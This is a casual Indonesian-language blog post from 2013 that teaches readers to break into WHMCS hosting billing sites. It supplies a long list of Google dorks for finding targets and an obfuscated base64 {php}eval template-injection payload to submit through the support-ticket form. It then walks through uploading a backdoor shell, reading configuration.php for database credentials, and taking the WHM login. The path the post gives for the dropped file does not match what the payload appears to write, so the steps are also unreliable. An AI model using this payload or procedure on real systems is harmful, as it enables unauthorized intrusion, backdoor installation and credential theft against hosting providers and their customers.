Wednesday, May 8, 2013

Tutorial Mencari WHM

kali ini saya akan posting dengan sesuai judulnya :)
langsung aja yah ga usah panjang-panjang basa-basinya :D
cekidot :D

pertama-tama jalan-jalan dulu di Google lalu gunakan dork ini
Dork : 
intext:Powered by WHMCompleteSolution inurl:submitticket.php
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
pilih salah satu yah kak di google, inget jangan malas yah mencarinya di google :D
semangat terus jangan menyerah :D
 Exploit  


{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiYWpheC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs=')) ;{/php})

bila sudah mendapatkan target  lalu kita pasang exploit seperti yang di atas yah gan :D
lalu taruh Exploit ini di Form Nama , Subject , Isi . 
untuk yang email , ngasal aja :p
ini screen shotnya :D






Kalo sudah sukses terkirim berarti berhasil, mari kita cek berhasil apa kaga :D
berhasil atau tidak itu tergantu "FACE" gan :D
berhubung gw ganteng dan tampan jadi 80% selalu berhasil dan 20% selalu gagal kwokwokwokwok kidding :D

bila sudah berhasil atau sukses lalu ganti url :
submitticket.php menjadi /templates/jxh.php

nah disitu baru kita upload shell atau backdoor kita :D
kalau sudah berhasil di upload lalu rubah url mendjadi /templates/nama_backdoor_kita.php
"WOW"
berhasil nih ye ckckckck :D

oke sekarang kita masuk ke step selanjutnya :D
cari configuration.php lalu klik :D

"WOW" kita dapat DB nya :D






step selanjutnya kita connecting ke DB nya :D




oke sekarang kita berhasil mendapatkan user dan password WHM nya :D
sekarang tinggal login dah :D
untuk port WHM biasanya menggunakan port 2086 atau 2087
contoh : http://domain.com:2087

Sekian dulu yah dari ane admin paling ganteng dan paling tampan, ane mau pamit undur diri dulu karna ane tidur :D

oh iya satu lagi ada yang ke tinggalan :D
kalau mau copas jangan lupa sertakan sumber yah kak :D
gak malu apa jadi "COPASER" kwokwowkokw :D
sumber 

No comments:

Post a Comment